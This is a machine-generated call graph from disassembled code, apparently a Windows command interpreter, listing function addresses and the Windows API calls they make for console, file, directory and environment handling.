7ff6a0e7d3f0 17083->17097 17086 7ff6a0e9be70 17090 7ff6a0e9be8e _wcsicmp 17086->17090 17091 7ff6a0e9be84 17086->17091 17087 7ff6a0e9be52 17125 7ff6a0e73240 17087->17125 17089 7ff6a0e9be6b 17092 7ff6a0e9bea8 17090->17092 17093 7ff6a0e9bebb _wcsicmp 17090->17093 17133 7ff6a0e73278 17091->17133 17128 7ff6a0e8498c 17092->17128 17093->17092 17094 7ff6a0e9bef0 _wcsicmp 17093->17094 17094->17089 17094->17091 17098 7ff6a0e7d810 17097->17098 17099 7ff6a0e7d420 17097->17099 17136 7ff6a0e7b998 17098->17136 17101 7ff6a0e8caad 17099->17101 17102 7ff6a0e7d46e GetProcessHeap HeapAlloc 17099->17102 17103 7ff6a0e73278 166 API calls 17101->17103 17102->17101 17108 7ff6a0e7d49a 17102->17108 17104 7ff6a0e8cab7 17103->17104 17107 7ff6a0e7d515 17117 7ff6a0e7d544 17107->17117 17108->17107 17109 7ff6a0e7d4e8 wcschr 17108->17109 17108->17117 17109->17108 17110 7ff6a0e8ca31 wcschr 17110->17117 17111 7ff6a0e7d54a iswspace 17113 7ff6a0e7d561 wcschr 17111->17113 17111->17117 17112 7ff6a0e7d5ee GetProcessHeap HeapReAlloc 17112->17101 17116 7ff6a0e7d61d GetProcessHeap HeapSize 17112->17116 17113->17117 17114 7ff6a0e7d586 wcschr 17114->17117 17115 7ff6a0e7d6ff iswspace 17115->17117 17118 7ff6a0e7d712 wcschr 17115->17118 17116->17117 17117->17101 17117->17110 17117->17111 17117->17112 17117->17114 17117->17115 17119 7ff6a0e7d668 17117->17119 17120 7ff6a0e7d759 wcschr 17117->17120 17122 7ff6a0e7d6c5 wcschr 17117->17122 17123 7ff6a0e8ca5a wcschr 17117->17123 17165 7ff6a0e89158 RtlCaptureContext RtlLookupFunctionEntry 17117->17165 17170 7ff6a0e9e91c 17117->17170 17118->17117 17121 7ff6a0e88f80 7 API calls 17119->17121 17120->17117 17124 7ff6a0e7d6a0 17121->17124 17122->17117 17123->17117 17124->17086 17124->17087 17531 7ff6a0e732b0 17125->17531 17129 7ff6a0e849ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17128->17129 17130 7ff6a0e849a4 17128->17130 17131 7ff6a0e84a14 5 API calls 17129->17131 17130->17129 17132 7ff6a0e849f1 17131->17132 17132->17089 17134 7ff6a0e732b0 166 API calls 17133->17134 17135 7ff6a0e732a4 17134->17135 17135->17089 17173 7ff6a0e7cd90 17136->17173 17139 7ff6a0e7b9a6 17139->17107 17140 7ff6a0e9e91c 198 API calls 17141 7ff6a0e7b9b1 memset 17140->17141 17179 7ff6a0e7ca40 17141->17179 17144 7ff6a0e8c3a8 17145 7ff6a0e7b998 199 API calls 17144->17145 17154 7ff6a0e8c41a 17145->17154 17146 7ff6a0e7badb 17146->17144 17149 7ff6a0e7bcef GetFileAttributesW 17146->17149 17151 7ff6a0e7bb05 17146->17151 17147 7ff6a0e7ba4c 17147->17144 17147->17146 17148 7ff6a0e7ba80 wcschr 17147->17148 17150 7ff6a0e7baa0 wcschr 17147->17150 17147->17151 17155 7ff6a0e7bb47 17147->17155 17148->17146 17148->17147 17149->17151 17150->17147 17153 7ff6a0e7bb29 _wcsicmp 17151->17153 17151->17155 17153->17151 17155->17144 17157 7ff6a0e7bb6b 17155->17157 17190 7ff6a0e788a8 17155->17190 17156 7ff6a0e7bc82 iswspace 17156->17157 17159 7ff6a0e7bc99 wcschr 17156->17159 17157->17144 17158 7ff6a0e7bb92 17157->17158 17160 7ff6a0e7bbe2 ??_V@YAXPEAX 17158->17160 17161 7ff6a0e7bbee 17158->17161 17159->17157 17162 7ff6a0e7bc46 17159->17162 17160->17161 17163 7ff6a0e88f80 7 API calls 17161->17163 17162->17144 17162->17156 17162->17157 17164 7ff6a0e7bc01 17163->17164 17164->17107 17166 7ff6a0e89195 RtlVirtualUnwind 17165->17166 17167 7ff6a0e891d7 17165->17167 17166->17167 17203 7ff6a0e88fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17167->17203 17204 7ff6a0e9e9b4 17170->17204 17174 7ff6a0e8c84e 17173->17174 17175 7ff6a0e7cda1 GetProcessHeap HeapAlloc 17173->17175 17177 7ff6a0e73278 164 API calls 17174->17177 17175->17174 17176 7ff6a0e7b9a1 17175->17176 17176->17139 17176->17140 17178 7ff6a0e8c858 17177->17178 17180 7ff6a0e7ca59 17179->17180 17181 7ff6a0e7cab8 17179->17181 17194 7ff6a0e89324 17180->17194 17181->17147 17184 7ff6a0e8c6e0 17186 7ff6a0e96d1c 14 API calls 17184->17186 17185 7ff6a0e7ca84 17187 7ff6a0e7ca9b memset 17185->17187 17188 7ff6a0e8c706 ??_V@YAXPEAX 17185->17188 17186->17181 17187->17181 17191 7ff6a0e788fc 17190->17191 17192 7ff6a0e788cf 17190->17192 17191->17162 17192->17191 17193 7ff6a0e788df _wcsicmp 17192->17193 17193->17192 17195 7ff6a0e89330 17194->17195 17198 7ff6a0e89a6c 17195->17198 17197 7ff6a0e7ca7b 17197->17184 17197->17185 17199 7ff6a0e89a86 malloc 17198->17199 17200 7ff6a0e89a91 17199->17200 17201 7ff6a0e89a77 17199->17201 17200->17197 17201->17199 17202 7ff6a0e89a97 Concurrency::cancel_current_task 17201->17202 17202->17197 17206 7ff6a0e9ea0f 17204->17206 17207 7ff6a0e9e9d9 17204->17207 17205 7ff6a0e9ea67 17234 7ff6a0e9c978 17205->17234 17206->17205 17229 7ff6a0e7af98 17206->17229 17216 7ff6a0e76a48 17207->17216 17211 7ff6a0e9eaae 17213 7ff6a0e9eacf 17211->17213 17249 7ff6a0e83a0c 17211->17249 17212 7ff6a0e9ea6c 17212->17211 17244 7ff6a0e7d208 17212->17244 17217 7ff6a0e76b23 17216->17217 17218 7ff6a0e76a51 17216->17218 17217->17206 17218->17217 17219 7ff6a0e9417c 17218->17219 17220 7ff6a0e76ab2 17218->17220 17324 7ff6a0e9ec14 memset 17219->17324 17255 7ff6a0e83c24 17220->17255 17231 7ff6a0e7afb1 17229->17231 17230 7ff6a0e7afdb 17230->17206 17231->17230 17233 7ff6a0e7d208 _close 17231->17233 17529 7ff6a0e7b038 _dup2 17231->17529 17233->17231 17235 7ff6a0e9ca9e 17234->17235 17236 7ff6a0e9c98e 17234->17236 17235->17212 17237 7ff6a0e9ee4c TerminateProcess GetLastError 17236->17237 17243 7ff6a0e9c9b3 17236->17243 17237->17236 17238 7ff6a0e85cb4 7 API calls 17238->17243 17239 7ff6a0e9ca21 _get_osfhandle FlushFileBuffers 17241 7ff6a0e7b038 _dup2 17239->17241 17240 7ff6a0e7d208 _close 17240->17243 17241->17243 17242 7ff6a0e7b038 _dup2 17242->17243 17243->17235 17243->17238 17243->17239 17243->17240 17243->17242 17245 7ff6a0e7d246 17244->17245 17246 7ff6a0e7d211 17244->17246 17245->17212 17247 7ff6a0e7d238 _close 17246->17247 17248 7ff6a0e8ca0e 17246->17248 17247->17245 17248->17212 17250 7ff6a0e83a53 FindClose 17249->17250 17253 7ff6a0e83a25 17249->17253 17251 7ff6a0e83a74 GetLastError 17250->17251 17252 7ff6a0e83a66 17250->17252 17251->17252 17252->17211 17253->17250 17254 7ff6a0e8ec38 17253->17254 17256 7ff6a0e83c67 17255->17256 17257 7ff6a0e8412c 17256->17257 17258 7ff6a0e7ca40 17 API calls 17256->17258 17259 7ff6a0e88f80 7 API calls 17257->17259 17260 7ff6a0e83c94 17258->17260 17261 7ff6a0e76abf GetProcessHeap RtlFreeHeap 17259->17261 17262 7ff6a0e8ec97 17260->17262 17345 7ff6a0e7b900 17260->17345 17320 7ff6a0e76b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17261->17320 17263 7ff6a0e8855c ??_V@YAXPEAX 17262->17263 17265 7ff6a0e8eca1 17263->17265 17267 7ff6a0e83cb8 GetCurrentDirectoryW towupper iswalpha 17269 7ff6a0e83fb8 17267->17269 17270 7ff6a0e83d68 17267->17270 17272 7ff6a0e83fc6 GetLastError 17269->17272 17270->17269 17271 7ff6a0e83d72 towupper GetFullPathNameW 17270->17271 17271->17272 17273 7ff6a0e83dd3 17271->17273 17371 7ff6a0e8855c 17272->17371 17275 7ff6a0e83fe0 17273->17275 17292 7ff6a0e83de3 17273->17292 17277 7ff6a0e8855c ??_V@YAXPEAX 17275->17277 17276 7ff6a0e840fe 17278 7ff6a0e8855c ??_V@YAXPEAX 17276->17278 17279 7ff6a0e83ffb _local_unwind 17277->17279 17280 7ff6a0e84108 _local_unwind 17278->17280 17281 7ff6a0e8400c GetLastError 17279->17281 17282 7ff6a0e83f98 17280->17282 17283 7ff6a0e84028 17281->17283 17284 7ff6a0e83e95 17281->17284 17374 7ff6a0e7ff70 17282->17374 17283->17284 17287 7ff6a0e84031 17283->17287 17285 7ff6a0e83ecf 17284->17285 17349 7ff6a0e82978 17284->17349 17289 7ff6a0e83f08 17285->17289 17290 7ff6a0e83ed5 GetFileAttributesW 17285->17290 17294 7ff6a0e8855c ??_V@YAXPEAX 17287->17294 17300 7ff6a0e83f1e SetCurrentDirectoryW 17289->17300 17304 7ff6a0e83f46 17289->17304 17297 7ff6a0e83efd 17290->17297 17298 7ff6a0e84067 GetLastError 17290->17298 17292->17276 17293 7ff6a0e83e66 GetFileAttributesW 17292->17293 17293->17281 17293->17284 17295 7ff6a0e8403b _local_unwind 17294->17295 17301 7ff6a0e8404c 17295->17301 17296 7ff6a0e83ec7 17296->17285 17296->17301 17297->17289 17303 7ff6a0e8409d 17297->17303 17302 7ff6a0e8855c ??_V@YAXPEAX 17298->17302 17299 7ff6a0e8855c ??_V@YAXPEAX 17299->17257 17300->17304 17305 7ff6a0e840b8 GetLastError 17300->17305 17306 7ff6a0e8855c ??_V@YAXPEAX 17301->17306 17307 7ff6a0e8408c _local_unwind 17302->17307 17308 7ff6a0e8855c ??_V@YAXPEAX 17303->17308 17310 7ff6a0e8498c 8 API calls 17304->17310 17309 7ff6a0e8855c ??_V@YAXPEAX 17305->17309 17311 7ff6a0e84056 _local_unwind 17306->17311 17307->17303 17312 7ff6a0e840a7 _local_unwind 17308->17312 17313 7ff6a0e840d2 _local_unwind 17309->17313 17314 7ff6a0e83f67 17310->17314 17311->17298 17312->17305 17315 7ff6a0e840e3 17313->17315 17314->17315 17316 7ff6a0e83f6f 17314->17316 17317 7ff6a0e8855c ??_V@YAXPEAX 17315->17317 17362 7ff6a0e8417c 17316->17362 17319 7ff6a0e840ed _local_unwind 17317->17319 17319->17276 17523 7ff6a0e84a14 GetEnvironmentStringsW 17320->17523 17323 7ff6a0e76b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17325 7ff6a0e7ca40 17 API calls 17324->17325 17326 7ff6a0e9ec96 17325->17326 17327 7ff6a0e9edf7 17326->17327 17330 7ff6a0e8081c 166 API calls 17326->17330 17328 7ff6a0e9ee16 17327->17328 17329 7ff6a0e9ee0a ??_V@YAXPEAX 17327->17329 17331 7ff6a0e88f80 7 API calls 17328->17331 17329->17328 17332 7ff6a0e9ecca 17330->17332 17333 7ff6a0e94190 17331->17333 17334 7ff6a0e9ecd2 SetCurrentDirectoryW 17332->17334 17335 7ff6a0e9ecfb 17332->17335 17336 7ff6a0e9edd4 17334->17336 17337 7ff6a0e9ece9 SetErrorMode 17334->17337 17338 7ff6a0e8498c 8 API calls 17335->17338 17339 7ff6a0e8417c 166 API calls 17336->17339 17337->17335 17340 7ff6a0e9ed89 SetCurrentDirectoryW 17338->17340 17339->17327 17341 7ff6a0e9edc1 17340->17341 17342 7ff6a0e9edac GetLastError 17340->17342 17341->17336 17344 7ff6a0e9edc6 SetErrorMode 17341->17344 17343 7ff6a0e73278 166 API calls 17342->17343 17343->17341 17344->17336 17346 7ff6a0e7b914 17345->17346 17346->17346 17347 7ff6a0e7cd90 166 API calls 17346->17347 17348 7ff6a0e7b92a 17347->17348 17348->17262 17348->17267 17350 7ff6a0e829b9 17349->17350 17350->17350 17351 7ff6a0e82a1e FindFirstFileW 17350->17351 17352 7ff6a0e8e3f7 17350->17352 17354 7ff6a0e829ed 17350->17354 17356 7ff6a0e82aeb _wcsnicmp 17350->17356 17358 7ff6a0e8e3d6 _wcsicmp 17350->17358 17359 7ff6a0e82a9d memmove 17350->17359 17360 7ff6a0e8e404 memmove 17350->17360 17351->17352 17353 7ff6a0e82a44 FindClose 17351->17353 17352->17296 17353->17350 17355 7ff6a0e88f80 7 API calls 17354->17355 17357 7ff6a0e82a02 17355->17357 17356->17350 17357->17296 17358->17350 17358->17352 17359->17350 17360->17352 17363 7ff6a0e841a8 GetCurrentDirectoryW 17362->17363 17364 7ff6a0e841d4 towupper 17362->17364 17369 7ff6a0e841b9 17363->17369 17378 7ff6a0e8081c GetEnvironmentVariableW 17364->17378 17366 7ff6a0e88f80 7 API calls 17368 7ff6a0e841c8 17366->17368 17368->17282 17369->17366 17370 7ff6a0e8ecac towupper 17372 7ff6a0e88583 17371->17372 17373 7ff6a0e88574 ??_V@YAXPEAX 17371->17373 17372->17275 17373->17372 17375 7ff6a0e7ffdb 17374->17375 17376 7ff6a0e7ff7c 17374->17376 17375->17299 17376->17375 17377 7ff6a0e7ffb5 GetProcessHeap RtlFreeHeap 17376->17377 17377->17375 17379 7ff6a0e80877 17378->17379 17380 7ff6a0e8085e 17378->17380 17381 7ff6a0e80884 _wcsicmp 17379->17381 17382 7ff6a0e80970 17379->17382 17380->17369 17380->17370 17383 7ff6a0e808a2 _wcsicmp 17381->17383 17386 7ff6a0e80989 17381->17386 17399 7ff6a0e83140 17382->17399 17385 7ff6a0e808c0 _wcsicmp 17383->17385 17383->17386 17384 7ff6a0e8417c 154 API calls 17384->17386 17385->17386 17388 7ff6a0e808de _wcsicmp 17385->17388 17386->17384 17389 7ff6a0e833f0 _vsnwprintf 17386->17389 17395 7ff6a0e89158 7 API calls 17386->17395 17425 7ff6a0e76ee4 17386->17425 17390 7ff6a0e808fc _wcsicmp 17388->17390 17391 7ff6a0e8d8d3 GetCommandLineW 17388->17391 17389->17386 17390->17386 17392 7ff6a0e8091a _wcsicmp 17390->17392 17396 7ff6a0e8d8e5 rand 17391->17396 17392->17382 17393 7ff6a0e80934 _wcsicmp 17392->17393 17393->17396 17397 7ff6a0e80952 _wcsicmp 17393->17397 17395->17386 17396->17386 17397->17382 17398 7ff6a0e8d8f9 GetNumaHighestNodeNumber 17397->17398 17398->17386 17400 7ff6a0e8e59e 17399->17400 17401 7ff6a0e83184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17399->17401 17459 7ff6a0e98654 17400->17459 17402 7ff6a0e831e0 17401->17402 17403 7ff6a0e8e5ed 17401->17403 17406 7ff6a0e8e5a8 17402->17406 17407 7ff6a0e831ff 17402->17407 17405 7ff6a0e8e5fe 17403->17405 17414 7ff6a0e8e750 17403->17414 17470 7ff6a0e85508 GetUserDefaultLCID 17405->17470 17465 7ff6a0e83448 17406->17465 17409 7ff6a0e833f0 _vsnwprintf 17407->17409 17412 7ff6a0e83247 17409->17412 17417 7ff6a0e88f80 7 API calls 17412->17417 17413 7ff6a0e8e5e8 17416 7ff6a0e833f0 _vsnwprintf 17414->17416 17415 7ff6a0e8e629 17418 7ff6a0e8e711 17415->17418 17424 7ff6a0e8e6e7 memmove 17415->17424 17419 7ff6a0e8e748 17416->17419 17420 7ff6a0e83266 17417->17420 17421 7ff6a0e85508 GetUserDefaultLCID 17418->17421 17419->17413 17419->17419 17472 7ff6a0e834a0 17419->17472 17420->17386 17422 7ff6a0e8e716 GetTimeFormatW 17421->17422 17422->17419 17424->17415 17426 7ff6a0e76f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17425->17426 17442 7ff6a0e76fbf 17425->17442 17427 7ff6a0e76f90 17426->17427 17436 7ff6a0e942b6 17426->17436 17429 7ff6a0e85508 GetUserDefaultLCID 17427->17429 17428 7ff6a0e98654 9 API calls 17428->17442 17430 7ff6a0e76f97 GetLocaleInfoW 17429->17430 17430->17442 17431 7ff6a0e9433f 17433 7ff6a0e833f0 _vsnwprintf 17431->17433 17432 7ff6a0e94322 realloc 17432->17431 17432->17436 17435 7ff6a0e9437d 17433->17435 17434 7ff6a0e85508 GetUserDefaultLCID 17437 7ff6a0e77042 GetDateFormatW 17434->17437 17450 7ff6a0e943ea 17435->17450 17453 7ff6a0e943fb 17435->17453 17436->17431 17436->17432 17438 7ff6a0e73278 153 API calls 17436->17438 17439 7ff6a0e7707a 17437->17439 17438->17436 17440 7ff6a0e85508 GetUserDefaultLCID 17439->17440 17446 7ff6a0e7708a 17439->17446 17441 7ff6a0e7714a GetDateFormatW 17440->17441 17443 7ff6a0e942a0 GetLastError 17441->17443 17444 7ff6a0e77175 realloc 17441->17444 17442->17428 17442->17434 17442->17442 17445 7ff6a0e9427f memmove 17442->17445 17449 7ff6a0e77020 memmove 17442->17449 17443->17436 17444->17436 17447 7ff6a0e7719c 17444->17447 17445->17442 17446->17435 17456 7ff6a0e770bd 17446->17456 17448 7ff6a0e85508 GetUserDefaultLCID 17447->17448 17451 7ff6a0e771ae GetDateFormatW 17448->17451 17449->17442 17452 7ff6a0e83448 153 API calls 17450->17452 17451->17442 17451->17443 17455 7ff6a0e943f9 17452->17455 17454 7ff6a0e83448 153 API calls 17453->17454 17454->17455 17456->17455 17456->17456 17457 7ff6a0e88f80 7 API calls 17456->17457 17458 7ff6a0e77129 17457->17458 17458->17386 17460 7ff6a0e98673 GetSystemTime 17459->17460 17461 7ff6a0e98686 17459->17461 17462 7ff6a0e986cc SystemTimeToFileTime 17460->17462 17461->17462 17463 7ff6a0e88f80 7 API calls 17462->17463 17464 7ff6a0e986ed 17463->17464 17464->17406 17495 7ff6a0e8363c 17465->17495 17468 7ff6a0e834a0 166 API calls 17469 7ff6a0e83491 17468->17469 17469->17413 17471 7ff6a0e85529 GetLocaleInfoW 17470->17471 17471->17415 17473 7ff6a0e834bf 17472->17473 17494 7ff6a0e834f5 17472->17494 17499 7ff6a0e83578 _get_osfhandle 17473->17499 17476 7ff6a0e8350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17479 7ff6a0e8e8d2 GetLastError 17476->17479 17480 7ff6a0e83557 ReleaseSRWLockShared 17476->17480 17477 7ff6a0e834cd 17506 7ff6a0e836ec _get_osfhandle 17477->17506 17482 7ff6a0e8e8e5 GetLastError 17479->17482 17481 7ff6a0e834e1 17480->17481 17481->17482 17481->17494 17513 7ff6a0e801b8 _get_osfhandle GetFileType 17482->17513 17485 7ff6a0e8e918 17518 7ff6a0e9f318 _get_osfhandle GetFileType 17485->17518 17486 7ff6a0e8e908 17487 7ff6a0e73278 160 API calls 17486->17487 17487->17494 17489 7ff6a0e8e91f 17490 7ff6a0e8e931 17489->17490 17491 7ff6a0e8e923 17489->17491 17519 7ff6a0e9f1d8 17490->17519 17492 7ff6a0e73278 160 API calls 17491->17492 17492->17494 17494->17413 17496 7ff6a0e83664 17495->17496 17498 7ff6a0e8347b 17495->17498 17497 7ff6a0e83684 _vsnwprintf 17496->17497 17497->17498 17498->17468 17500 7ff6a0e83599 GetFileType 17499->17500 17501 7ff6a0e834c9 17499->17501 17500->17501 17504 7ff6a0e835b1 17500->17504 17501->17476 17501->17477 17502 7ff6a0e8e940 17503 7ff6a0e835c3 GetStdHandle 17505 7ff6a0e835d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17503->17505 17504->17502 17504->17503 17504->17505 17505->17501 17507 7ff6a0e8e95c WriteFile 17506->17507 17512 7ff6a0e83731 17506->17512 17508 7ff6a0e8e980 WideCharToMultiByte WriteFile 17507->17508 17511 7ff6a0e837a1 17508->17511 17508->17512 17509 7ff6a0e83747 17510 7ff6a0e8374b WideCharToMultiByte WriteFile 17509->17510 17509->17511 17510->17511 17511->17481 17512->17508 17512->17509 17512->17511 17514 7ff6a0e801eb 17513->17514 17515 7ff6a0e80200 17513->17515 17514->17485 17514->17486 17515->17514 17516 7ff6a0e80221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17515->17516 17517 7ff6a0e80212 GetStdHandle 17515->17517 17516->17514 17517->17516 17518->17489 17520 7ff6a0e9f1e8 17519->17520 17521 7ff6a0e9f220 17520->17521 17522 7ff6a0e73278 166 API calls 17520->17522 17521->17494 17522->17521 17524 7ff6a0e76ae8 17523->17524 17528 7ff6a0e84a40 GetProcessHeap HeapAlloc 17523->17528 17524->17323 17526 7ff6a0e84a91 memmove 17527 7ff6a0e84a9f FreeEnvironmentStringsW 17526->17527 17527->17524 17528->17526 17528->17527 17530 7ff6a0e7b061 17529->17530 17530->17231 17530->17530 17532 7ff6a0e83578 6 API calls 17531->17532 17533 7ff6a0e732e8 17532->17533 17534 7ff6a0e732f0 _get_osfhandle GetConsoleScreenBufferInfo 17533->17534 17535 7ff6a0e7331d 17533->17535 17534->17535 17567 7ff6a0e73410 17535->17567 17537 7ff6a0e733a8 17540 7ff6a0e733b0 17537->17540 17542 7ff6a0e911ff 17537->17542 17538 7ff6a0e836ec 6 API calls 17543 7ff6a0e7333d 17538->17543 17539 7ff6a0e73368 WriteConsoleW 17539->17543 17544 7ff6a0e911cc GetLastError 17539->17544 17545 7ff6a0e88f80 7 API calls 17540->17545 17541 7ff6a0e91057 GetConsoleScreenBufferInfo 17541->17543 17546 7ff6a0e91079 WriteConsoleW 17541->17546 17583 7ff6a0e84c1c 17542->17583 17543->17537 17543->17538 17543->17539 17543->17541 17543->17544 17548 7ff6a0e911df GetLastError 17543->17548 17552 7ff6a0e73400 17543->17552 17544->17543 17549 7ff6a0e7326c 17545->17549 17546->17543 17550 7ff6a0e910a8 9 API calls 17546->17550 17548->17537 17549->17089 17550->17543 17553 7ff6a0e91181 17550->17553 17552->17548 17582 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 17553->17582 17568 7ff6a0e7345c FormatMessageW 17567->17568 17569 7ff6a0e912cd _ultoa GetACP 17567->17569 17568->17569 17577 7ff6a0e7348b 17568->17577 17587 7ff6a0e80460 17569->17587 17572 7ff6a0e7349d wcschr 17573 7ff6a0e734b4 17572->17573 17572->17577 17574 7ff6a0e734c4 FormatMessageW 17573->17574 17575 7ff6a0e9121d GetProcessHeap HeapAlloc 17573->17575 17576 7ff6a0e734ef 17574->17576 17575->17576 17581 7ff6a0e9124f FormatMessageW GetProcessHeap RtlFreeHeap 17575->17581 17578 7ff6a0e88f80 7 API calls 17576->17578 17577->17572 17577->17573 17580 7ff6a0e734ff 17578->17580 17580->17543 17581->17569 17584 7ff6a0e84c24 17583->17584 17586 7ff6a0e84c2f exit 17584->17586 17589 7ff6a0e84c50 17584->17589 17588 7ff6a0e80472 MultiByteToWideChar 17587->17588 17595 7ff6a0e84cb0 17589->17595 17592 7ff6a0e84c6c 17592->17584 17593 7ff6a0e83c24 164 API calls 17594 7ff6a0e84c84 GetProcessHeap RtlFreeHeap 17593->17594 17594->17592 17599 7ff6a0e84cfa 17595->17599 17600 7ff6a0e84cda 17595->17600 17596 7ff6a0e88f80 7 API calls 17597 7ff6a0e84c64 17596->17597 17597->17592 17597->17593 17598 7ff6a0e8eefe realloc 17598->17600 17599->17598 17599->17600 17600->17596 20148 7ff6a0e7b3f0 20150 7ff6a0e7b41a 20148->20150 20149 7ff6a0e8c2a3 iswdigit 20149->20150 20151 7ff6a0e8c2b7 20149->20151 20150->20149 20152 7ff6a0e7b42f 20150->20152 20153 7ff6a0e73278 166 API calls 20151->20153 20156 7ff6a0e7be00 20152->20156 20155 7ff6a0e7b461 20153->20155 20157 7ff6a0e7bec8 20156->20157 20158 7ff6a0e7be1b 20156->20158 20157->20155 20158->20157 20159 7ff6a0e7be67 20158->20159 20160 7ff6a0e7be47 memset 20158->20160 20162 7ff6a0e7be73 20159->20162 20163 7ff6a0e7bf29 20159->20163 20166 7ff6a0e7beaf 20159->20166 20262 7ff6a0e7bff0 20160->20262 20164 7ff6a0e7be92 20162->20164 20167 7ff6a0e7bf0c 20162->20167 20165 7ff6a0e7cd90 166 API calls 20163->20165 20173 7ff6a0e7bea1 20164->20173 20190 7ff6a0e7c620 GetConsoleTitleW 20164->20190 20169 7ff6a0e7bf33 20165->20169 20166->20157 20171 7ff6a0e7bff0 185 API calls 20166->20171 20300 7ff6a0e7b0d8 memset 20167->20300 20169->20166 20174 7ff6a0e7bf70 20169->20174 20177 7ff6a0e788a8 _wcsicmp 20169->20177 20171->20157 20173->20166 20178 7ff6a0e7af98 2 API calls 20173->20178 20184 7ff6a0e7bf75 20174->20184 20413 7ff6a0e771ec 20174->20413 20175 7ff6a0e7bf1e 20175->20166 20180 7ff6a0e7bf5a 20177->20180 20178->20166 20179 7ff6a0e7bfa9 20179->20166 20181 7ff6a0e7cd90 166 API calls 20179->20181 20180->20174 20360 7ff6a0e80a6c 20180->20360 20183 7ff6a0e7bfbb 20181->20183 20183->20166 20186 7ff6a0e8081c 166 API calls 20183->20186 20185 7ff6a0e7b0d8 194 API calls 20184->20185 20187 7ff6a0e7bf7f 20185->20187 20186->20184 20187->20166 20233 7ff6a0e85ad8 20187->20233 20191 7ff6a0e7ca2f 20190->20191 20193 7ff6a0e7c675 20190->20193 20192 7ff6a0e8c5fc GetLastError 20191->20192 20195 7ff6a0e73278 166 API calls 20191->20195 20196 7ff6a0e8855c ??_V@YAXPEAX 20191->20196 20192->20191 20194 7ff6a0e7ca40 17 API calls 20193->20194 20205 7ff6a0e7c69b 20194->20205 20195->20191 20196->20191 20197 7ff6a0e8291c 8 API calls 20203 7ff6a0e7c762 20197->20203 20198 7ff6a0e7c9b5 20202 7ff6a0e8855c ??_V@YAXPEAX 20198->20202 20199 7ff6a0e789c0 23 API calls 20199->20203 20200 7ff6a0e7c978 towupper 20200->20203 20201 7ff6a0e8855c ??_V@YAXPEAX 20201->20203 20204 7ff6a0e7c855 20202->20204 20203->20191 20203->20192 20203->20197 20203->20198 20203->20199 20203->20200 20203->20201 20203->20203 20206 7ff6a0e8c60e 20203->20206 20218 7ff6a0e7c83d 20203->20218 20221 7ff6a0e7c78a wcschr 20203->20221 20223 7ff6a0e7ca25 20203->20223 20225 7ff6a0e8c684 20203->20225 20228 7ff6a0e7ca2a 20203->20228 20230 7ff6a0e7ca16 GetLastError 20203->20230 20208 7ff6a0e7c872 20204->20208 20212 7ff6a0e8c6b8 SetConsoleTitleW 20204->20212 20205->20191 20205->20198 20205->20203 20207 7ff6a0e7d3f0 223 API calls 20205->20207 20209 7ff6a0e9ec14 173 API calls 20206->20209 20210 7ff6a0e7c741 20207->20210 20211 7ff6a0e8855c ??_V@YAXPEAX 20208->20211 20209->20203 20213 7ff6a0e7c74d 20210->20213 20215 7ff6a0e7c8b5 wcsncmp 20210->20215 20214 7ff6a0e7c87c 20211->20214 20212->20208 20213->20203 20216 7ff6a0e7bd38 207 API calls 20213->20216 20217 7ff6a0e88f80 7 API calls 20214->20217 20215->20203 20215->20213 20216->20203 20219 7ff6a0e7c88e 20217->20219 20419 7ff6a0e7cb40 20218->20419 20219->20173 20221->20203 20226 7ff6a0e73278 166 API calls 20223->20226 20227 7ff6a0e73278 166 API calls 20225->20227 20226->20191 20227->20191 20229 7ff6a0e89158 7 API calls 20228->20229 20229->20191 20232 7ff6a0e73278 166 API calls 20230->20232 20232->20191 20234 7ff6a0e7cd90 166 API calls 20233->20234 20235 7ff6a0e85b12 20234->20235 20236 7ff6a0e85b8b 20235->20236 20237 7ff6a0e7cb40 166 API calls 20235->20237 20239 7ff6a0e88f80 7 API calls 20236->20239 20238 7ff6a0e85b26 20237->20238 20238->20236 20241 7ff6a0e80a6c 273 API calls 20238->20241 20240 7ff6a0e7bf99 20239->20240 20240->20173 20242 7ff6a0e85b43 20241->20242 20243 7ff6a0e85bb8 20242->20243 20244 7ff6a0e85b48 GetConsoleTitleW 20242->20244 20245 7ff6a0e85bbd GetConsoleTitleW 20243->20245 20246 7ff6a0e85bf4 20243->20246 20247 7ff6a0e7cad4 172 API calls 20244->20247 20248 7ff6a0e7cad4 172 API calls 20245->20248 20249 7ff6a0e85bfd 20246->20249 20250 7ff6a0e8f452 20246->20250 20251 7ff6a0e85b66 20247->20251 20252 7ff6a0e85bdb 20248->20252 20249->20236 20256 7ff6a0e85c1b 20249->20256 20257 7ff6a0e8f462 20249->20257 20254 7ff6a0e83c24 166 API calls 20250->20254 20435 7ff6a0e84224 InitializeProcThreadAttributeList 20251->20435 20495 7ff6a0e796e8 20252->20495 20254->20236 20258 7ff6a0e73278 166 API calls 20256->20258 20260 7ff6a0e73278 166 API calls 20257->20260 20258->20236 20259 7ff6a0e85b7f 20261 7ff6a0e85c3c SetConsoleTitleW 20259->20261 20260->20236 20261->20236 20263 7ff6a0e7c01c 20262->20263 20264 7ff6a0e7c0c4 20262->20264 20265 7ff6a0e7c086 20263->20265 20266 7ff6a0e7c022 20263->20266 20264->20159 20269 7ff6a0e7c144 20265->20269 20282 7ff6a0e7c094 20265->20282 20267 7ff6a0e7c113 20266->20267 20268 7ff6a0e7c030 20266->20268 20278 7ff6a0e7ff70 2 API calls 20267->20278 20283 7ff6a0e7c053 20267->20283 20270 7ff6a0e7c039 wcschr 20268->20270 20268->20283 20274 7ff6a0e7c151 20269->20274 20289 7ff6a0e7c1c8 20269->20289 20271 7ff6a0e7c301 20270->20271 20270->20283 20277 7ff6a0e7cd90 166 API calls 20271->20277 20272 7ff6a0e7c058 20284 7ff6a0e7ff70 2 API calls 20272->20284 20287 7ff6a0e7c073 20272->20287 20273 7ff6a0e7c0c6 20275 7ff6a0e7c0cf wcschr 20273->20275 20273->20287 20770 7ff6a0e7c460 20274->20770 20281 7ff6a0e7c1be 20275->20281 20275->20287 